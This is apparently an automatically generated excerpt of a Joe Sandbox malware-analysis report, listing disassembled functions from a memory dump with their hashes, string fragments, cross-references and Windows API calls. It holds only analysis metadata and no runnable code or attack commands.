Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: *<($*<($K5<$K5<$K5<$L5<$L5<$X|Go$X|Go$[+]: %P$qxT+$qxT+$qxT+$qxT+$rxT+$rxT+
API String ID: 0-661926131
Opcode ID: cdd1cfd638bed6e71074e407f1f171b691a9e294dfb71532468a8ded6b9e8815
Instruction ID: 3378e8611a6cf44e5c238ae65c7bd578be3685c9bc2720c235a697cd62b1ee1d
Opcode Fuzzy Hash: cdd1cfd638bed6e71074e407f1f171b691a9e294dfb71532468a8ded6b9e8815
Instruction Fuzzy Hash: 5DA226366087408FDB28CA28C8D57EE77E2ABD5350F24C92EE89DC7355D735C9868B42

Function 001831F0 Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 438COMMON

Download Yara Rule

Strings

-A;, xrefs: 001836CB
,A;, xrefs: 001837B5
,A;, xrefs: 001836A0
,A;, xrefs: 0018370D
,A;, xrefs: 00183793
-A;, xrefs: 00183680
yHP, xrefs: 00183215
yHP, xrefs: 001832F0
yHP, xrefs: 001832FC

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: ,A;$,A;$,A;$,A;$-A;$-A;$yHP$yHP$yHP
API String ID: 0-674415475
Opcode ID: 08d3d97d998165a420f758ad4950f9df06a5d12b10cd230cbb1c91c831b2324c
Instruction ID: c84cdede57f6f8d6657a5075b1a6a371c6259646409da1353caf8917865ad7d8
Opcode Fuzzy Hash: 08d3d97d998165a420f758ad4950f9df06a5d12b10cd230cbb1c91c831b2324c
Instruction Fuzzy Hash: F9D18C2A7143024FDB1895785CE52EF37C39F96750F29853ED822CB6A1E725CE8A8F41

Function 0018BCF0 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 273COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0018BD9E
___std_exception_copy.LIBVCRUNTIME ref: 0018BE78
___std_exception_copy.LIBVCRUNTIME ref: 0018BF73

Strings

[iP\, xrefs: 0018BE50
[iP\, xrefs: 0018BFF7
ZiP\, xrefs: 0018BD6B
[iP\, xrefs: 0018BF8A
"5M", xrefs: 0018BF52
"5M", xrefs: 0018BFCE
"5M", xrefs: 0018C050
[iP\, xrefs: 0018C008

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ___std_exception_copy
String ID: "5M"$"5M"$"5M"$ZiP\$[iP\$[iP\$[iP\$[iP\
API String ID: 2659868963-1964655981
Opcode ID: 618bedbd7a451228359cd12329892bc8739da7034323e6756fbf69dc9dd1713d
Instruction ID: 33788024cf001f9597d520521d79522f46d7ac6eb9fbf3b6fe8f9a0ae8795f5b
Opcode Fuzzy Hash: 618bedbd7a451228359cd12329892bc8739da7034323e6756fbf69dc9dd1713d
Instruction Fuzzy Hash: C291683A210B024FD714CA358CE63DB77E69B96314F65C92EE859CB2A0DB39D94D8F40

Function 0017FE40 Relevance: 15.1, Strings: 10, Instructions: 2596COMMON

Download Yara Rule

Strings

W, xrefs: 00180B1D
3aB, xrefs: 00180C52
hs, xrefs: 0018046F
is, xrefs: 00180C9E
is, xrefs: 00180D73
is, xrefs: 00180D22
3aB, xrefs: 00181745
W, xrefs: 00181500
W, xrefs: 001801FB
is, xrefs: 00181366

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: W$W$W$3aB$3aB$hs$is$is$is$is
API String ID: 0-4166734425
Opcode ID: ec91d4c0decdaccdb05327e31d975c6b03da7c03e932488b51677cbc78c8df73
Instruction ID: cdfb6de51e668d97a97c3760c38a6b9c51f2f2daa6ba5a858905f7162033401b
Opcode Fuzzy Hash: ec91d4c0decdaccdb05327e31d975c6b03da7c03e932488b51677cbc78c8df73
Instruction Fuzzy Hash: 761338367046408FDB28CA2888D57AF77E2AFD5310F25892DE899C7365DB35CD4A8F42

Function 0017A480 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 296COMMON

Download Yara Rule

Strings

>N/s, xrefs: 0017A864
>N/s, xrefs: 0017A52F
>N/s, xrefs: 0017A51D
>N/s, xrefs: 0017A85D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: >N/s$>N/s$>N/s$>N/s
API String ID: 0-1138143547
Opcode ID: 95ed39e1494002cf910692147b949be0ede864505fb3eddfa6060e1984fb5409
Instruction ID: d7bfe30868c94cb78686bb241ce00fbbb8b3ac7d3c2752131b4924aa47885e25
Opcode Fuzzy Hash: 95ed39e1494002cf910692147b949be0ede864505fb3eddfa6060e1984fb5409
Instruction Fuzzy Hash: 50912876B401024BCF18896998D56FFB7B39BD4314F79D916E409CB364EB2ACC868F42

Function 00187E70 Relevance: 10.8, APIs: 2, Strings: 3, Instructions: 2060COMMON

Download Yara Rule

Strings

!O<, xrefs: 00187F80
"O<, xrefs: 00187EA9
"O<, xrefs: 0018864D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: !O<$"O<$"O<
API String ID: 0-57260185
Opcode ID: f34a18fc7b448281cfa1a952b283ed067c17d355ead90806ea9b4677c5bb946a
Instruction ID: 6302b05d0c2213d73f86c6215f13cdc991d49d412dd02d01d18e4392a789897d
Opcode Fuzzy Hash: f34a18fc7b448281cfa1a952b283ed067c17d355ead90806ea9b4677c5bb946a
Instruction Fuzzy Hash: 0EF214357083408FCB28DA2888957AE7BE2AFD5314F68891DE899C7395DB35CD46CF42

Function 00185FA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00185FB6
Concurrency::cancel_current_task.LIBCPMT ref: 0018624C

Strings

hOLK, xrefs: 001861EE
hOLK, xrefs: 0018617D
hOLK, xrefs: 001860BC
hOLK, xrefs: 001861FC

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: Concurrency::cancel_current_task_strlen
String ID: hOLK$hOLK$hOLK$hOLK
API String ID: 575380510-348066219
Opcode ID: e6a145ea70f26ddf871181109284ae13506fc8edb03ac05604a8c6b39b381e02
Instruction ID: ad2c97b918075498fd29b9fd882d976327fb8f5e7d838f64727a69eb7f2f4728
Opcode Fuzzy Hash: e6a145ea70f26ddf871181109284ae13506fc8edb03ac05604a8c6b39b381e02
Instruction Fuzzy Hash: B651483A758700CFCB14AE1CC88426FB3E3EBE5714F6B441AE95587222DB318E459F82

Function 001AB532 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001AB749

Strings

1#INF, xrefs: 001AB668
1#IND, xrefs: 001AB637
1#SNAN, xrefs: 001AB63E
1#QNAN, xrefs: 001AB645

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0eb875fd5673ee3356ca42da450a19107dec754301bc32d6a60651a0f8293159
Instruction ID: a5eda3b4c0ca7a1a05334bfc826e38ae04600472d7de62548e9cbd3c247923ed
Opcode Fuzzy Hash: 0eb875fd5673ee3356ca42da450a19107dec754301bc32d6a60651a0f8293159
Instruction Fuzzy Hash: 65D24875E082288FDB64CE28DD847EAB7B5FB45305F1541EAD40DE7241EB78AE858F80

Function 001766F0 Relevance: 9.0, Strings: 7, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

Strings

5r$, xrefs: 00176985
5r$, xrefs: 0017691C
5r$, xrefs: 001768E2
5r$, xrefs: 001769C0
5r$, xrefs: 00176930
5r$, xrefs: 001769A6
5r$, xrefs: 00176938

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: 5r$$5r$$5r$$5r$$5r$$5r$$5r$
API String ID: 0-2049126361
Opcode ID: c90018b789811c309f7f724136c7c647381ec3c49a63c5ed2a728c58052bee48
Instruction ID: cb164c8d021d7876c967cf5f80f28a4700b74ee6e6961f89da493e8f20f3c83f
Opcode Fuzzy Hash: c90018b789811c309f7f724136c7c647381ec3c49a63c5ed2a728c58052bee48
Instruction Fuzzy Hash: 9961BC37B59B154F8B18D93A88C13AB73E357D4324F1BC62AC95DD3318DA7ACC815682

Function 001A5367 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001A4D1D,00000002,00000000,?,?,?,001A4D1D,?,00000000), ref: 001A5400
GetLocaleInfoW.KERNEL32(?,20001004,001A4D1D,00000002,00000000,?,?,?,001A4D1D,?,00000000), ref: 001A5429
GetACP.KERNEL32(?,?,001A4D1D,?,00000000), ref: 001A543E

Strings

OCP, xrefs: 001A53BB
ACP, xrefs: 001A5385

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 70c9b1a76955426152270fa245caaff9d01b851c89d3a3174595a1eee76d7fc2
Instruction ID: 71583f71daf1ccb2011c9e3ae1368bed12f53c277a0096e33739a8fcd9788963
Opcode Fuzzy Hash: 70c9b1a76955426152270fa245caaff9d01b851c89d3a3174595a1eee76d7fc2
Instruction Fuzzy Hash: 2321B37A70C900ABDF348F14C940A9772E7FF9ABA1B568024E90ADB111F772DE81D390

Function 001A4BE7 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 001A4CEF
IsValidCodePage.KERNEL32(00000000), ref: 001A4D2D
IsValidLocale.KERNEL32(?,00000001), ref: 001A4D40
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001A4D88
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001A4DA3

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 62eacf1e787e78d4714f386cbe7b27505c433f280ef7b6de30c1f4ddfcb270b5
Instruction ID: e2eee392404f5beef396b1f52b87f746a972c1fc103e8064ebaf72d3b68bc25b
Opcode Fuzzy Hash: 62eacf1e787e78d4714f386cbe7b27505c433f280ef7b6de30c1f4ddfcb270b5
Instruction Fuzzy Hash: C751B179A01209AFEF11DFA4CC41ABE73B8FF9A310F044529F915E7191E7B09A40CBA1

Function 0018E340 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

ci), xrefs: 0018E592
ci), xrefs: 0018E38B
ci), xrefs: 0018E734
ci), xrefs: 0018E3A8
ci), xrefs: 0018E380

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: ci)$ci)$ci)$ci)$ci)
API String ID: 0-4041680830
Opcode ID: 570158c59b0905fd0bd88724970e04c7891ca3bea4c7ec97e3e99c6b7f4f177c
Instruction ID: ef0d00210282a0e6b3315949c14ab3083b7ab65384929d51e50d1f6b957ee1e0
Opcode Fuzzy Hash: 570158c59b0905fd0bd88724970e04c7891ca3bea4c7ec97e3e99c6b7f4f177c
Instruction Fuzzy Hash: 8FA1A236B093114FD714DE28C8C56AA77D2AFD6314F1E8D19E889CB3A1D734CD468B82

Function 0017AD70 Relevance: 6.5, Strings: 5, Instructions: 258COMMON

Download Yara Rule

Strings

n)cg, xrefs: 0017ADA7
o)cg, xrefs: 0017AFE8
o)cg, xrefs: 0017B02A
o)cg, xrefs: 0017AF70
o)cg, xrefs: 0017AFDE

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: n)cg$o)cg$o)cg$o)cg$o)cg
API String ID: 0-2003806078
Opcode ID: be55e6a54fe8bbe1d33d524c3b5bd14c84f436a5cd38cda1b8a5234f5e029505
Instruction ID: 4dfe405ba02167b0ae8fddbde99bdcb19fc87e759637bbeab4ea5860030a88f6
Opcode Fuzzy Hash: be55e6a54fe8bbe1d33d524c3b5bd14c84f436a5cd38cda1b8a5234f5e029505
Instruction Fuzzy Hash: D3817B263003058BDB28897998E53AF77E28FD5341F69D43DD84ACB761DB26CC895B82

Function 00172750 Relevance: 6.5, APIs: 4, Instructions: 463threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00172B7C

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 3508a05bf91422b30803be6562c1664ba0290a64b2d1de43ac178000c9de5608
Instruction ID: 3cec148d5f627b5a69b1e6904a3bf2070c37247d86b51e97809dce4340cdc69d
Opcode Fuzzy Hash: 3508a05bf91422b30803be6562c1664ba0290a64b2d1de43ac178000c9de5608
Instruction Fuzzy Hash: 14E1572A3453014FDF2C893898F57EA37D69BD5311F28D52DE48ACB295D73A8C8ADB01

Function 0019CAA0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6d6bbfbdfac0af729e117258117d4ec5519420a9930abf5db6db09bc4664dc
Instruction ID: 0fc2af832d363256ec93b8b1b3641e3454d7f7e0f584e9734a15fd160df92552
Opcode Fuzzy Hash: 8a6d6bbfbdfac0af729e117258117d4ec5519420a9930abf5db6db09bc4664dc
Instruction Fuzzy Hash: 05023A71E012199BDF14CFA9C9906AEFBF1FF48314F258269E959E7380D731AA41CB90

Function 001A5949 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A5A39

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: dd16d661d8c6f3c16ad170088bb5c493882af28e514810352369a37e59266f44
Instruction ID: 97bc81c145e79d66907d81054ba136e8f481ec99f0f57a4bd0c53f5a89291dcd
Opcode Fuzzy Hash: dd16d661d8c6f3c16ad170088bb5c493882af28e514810352369a37e59266f44
Instruction Fuzzy Hash: 8571F67990951DAFDF21EF24CC89AAEB7BAEB16304F1441D9E00DE7211EB304E858F64

Function 00190F5B Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00190F67
IsDebuggerPresent.KERNEL32 ref: 00191033
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00191053
UnhandledExceptionFilter.KERNEL32(?), ref: 0019105D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 98243cfc69839c9960a53ed22eb010eb41f7497eaeb85245ca1a26404aa449d5
Instruction ID: 3be41655bcde072f2c54ccbe2fce1e70845aa2ff5c1a51952c7ea8003ce64ac8
Opcode Fuzzy Hash: 98243cfc69839c9960a53ed22eb010eb41f7497eaeb85245ca1a26404aa449d5
Instruction Fuzzy Hash: A4312775D0521D9BEF21DFA4D989BCDBBB8AF18304F1041AAE40CAB250EB719B85CF45

Function 001826B0 Relevance: 4.8, APIs: 3, Instructions: 251COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001826D4
std::_Facet_Register.LIBCPMT ref: 00182908

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
